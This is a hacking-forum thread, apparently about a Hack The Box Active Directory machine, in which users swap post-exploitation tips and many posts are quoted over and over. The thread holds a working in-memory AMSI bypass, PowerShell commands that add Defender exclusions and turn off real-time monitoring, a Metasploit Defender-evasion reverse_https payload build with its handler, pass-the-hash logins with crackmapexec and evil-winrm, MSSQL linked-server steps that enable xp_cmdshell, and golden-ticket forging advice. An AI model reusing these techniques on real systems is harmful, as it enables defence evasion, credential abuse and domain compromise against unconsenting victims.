[osamy7593]

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

---

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like

Yes this works too bypassing amsi .. Ok what u got

I have been readin the stuff on cross forest attacks....it is not quite clicking yet; well I don'tknow if I am messing up bloodhound anal-sis or I am plain illiterate glosing over soemthing in the readings

Direction              : BiDirectional

Someone told me golden ticket

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[bmoon10]

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

---

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

with nt authority rights you can disable the av using the powershell command

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like

with the nt authority rights you can disable the real time a/v monitoring using the powershell command. this will help you with downloading and using the mimikatz and other tools.

Set-MpPreference -DisableRealtimeMonitoring $true

[maggi]

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

---

I started running powerview but the av is whinging about everything else

with nt authority rights you can disable the av using the powershell command

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like

with the nt authority rights you can disable the real time a/v monitoring using the powershell command. this will help you with downloading and using the mimikatz and other tools.

Set-MpPreference -DisableRealtimeMonitoring $true

I can't get mimi to run, it hangs with a #, but I can now get msf to run

take it back spawned a fresh shell with nc and mimi loads....face palm for not trying that a while ago, but idk if thats the way.....

[r9967252]

it's weird even the user flag hasn't shown up yet.
not sure what to do next after getting administrator on primary.corp.ghost.htb, tried dcsync, golden ticket, silver ticket. the user should be in the domain admins group already, what else to do?

[bmoon10]

im stuck on ntauthority in PRIMARY

does anyone know where to go from here?

i can't run mimikatz, tried to obfuscate it doesn't work

I have tried many meterpreter shells those all get blocked.

i have a shell as ntauthority but no clue what to do at this point.

you can evade av using meterpreter windows defender evasion method

msf> use evasion/windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set payload windows/x64/meterpreter/reverse_https
msf6 evasion(windows/windows_defender_exe) > set lport 5555
msf6 evasion(windows/windows_defender_exe) > set lhost tun0
msf6 evasion(windows/windows_defender_exe) > run

[*]Compiled executable size: 4608
[+] cop.exe stored at /home/kali/.msf4/local/cop.exe

transfer the cop.exe to the target windows box

msf6 evasion(windows/windows_defender_exe) > handler -p windows/x64/meterpreter/reverse_https -H 0.0.0.0 -P 5555

execute the cop.exe in the target windows box for the meterpreter session

[Unbutton8074]

Primary...

└─$ proxychains4 -q crackmapexec smb 10.0.0.10 -u 'Administrator' -H '41515af3ada195029708a53d941ab751'
SMB        10.0.0.10      445    PRIMARY         
[*]Windows Server 2022 Build 20348 x64 (name:PRIMARY) (domain:corp.ghost.htb) (signing:True) (SMBv1:False)
SMB        10.0.0.10      445    PRIMARY          [+] corp.ghost.htb\Administrator:41515af3ada195029708a53d941ab751 (Pwn3d!)

└─$ proxychains4 -q evil-winrm -i 10.0.0.10 -u 'Administrator' -H '41515af3ada195029708a53d941ab751'

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
ghost-corp\administrator

Bloodhound...

[PRIMARY] --- Trusted by ---> [DC]
 

What's next?

i keep getting a connection refused when trying to connect with evil-winrm, what am i doing wrong? using 10.0.0.10 , what do i put in hosts file?

use ligolo-ng, i did struggle for it too

[wh1t3_r4bb1t]

If someone stuck with mssql, in thread missed 2 things:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > REGONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

[bmoon10]

If someone stuck with mssql, in thread missed 2 things:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > REGONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

In the impacket-mssqlclient utility after the 'exec_as_login sa' step use the enable_xp_cmdshell command .. it executes the same 4 lines EXEC sp_configure , RECONFIGURE etc.,

[wh1t3_r4bb1t]

If someone stuck with mssql, in thread missed 2 things:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > REGONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

In the impacket-mssqlclient utility after the 'exec_as_login sa' step use the enable_xp_cmdshell command .. it executes the same 4 lines EXEC sp_configure , RECONFIGURE etc.,

No, I was getting "let administrator enable xp_cmdshell" message after it, so need to enable it manually.
UPD. oh you mean "enable_xp_cmdshell", got it

[bmoon10]

I've got a hint for two different approaches, I haven't managed to exploit them, but I'll leave them here for someone smarter than me:
- In order to forge the golden ticket, the aes256 key must be used, the nt hash won't work
- Unconstrained delegation

I don't have more info, only that.

with mimikatz golden ticket can be obtained using ghost$ rc4 hash and corp.ghost.htb and ghost.htb sids.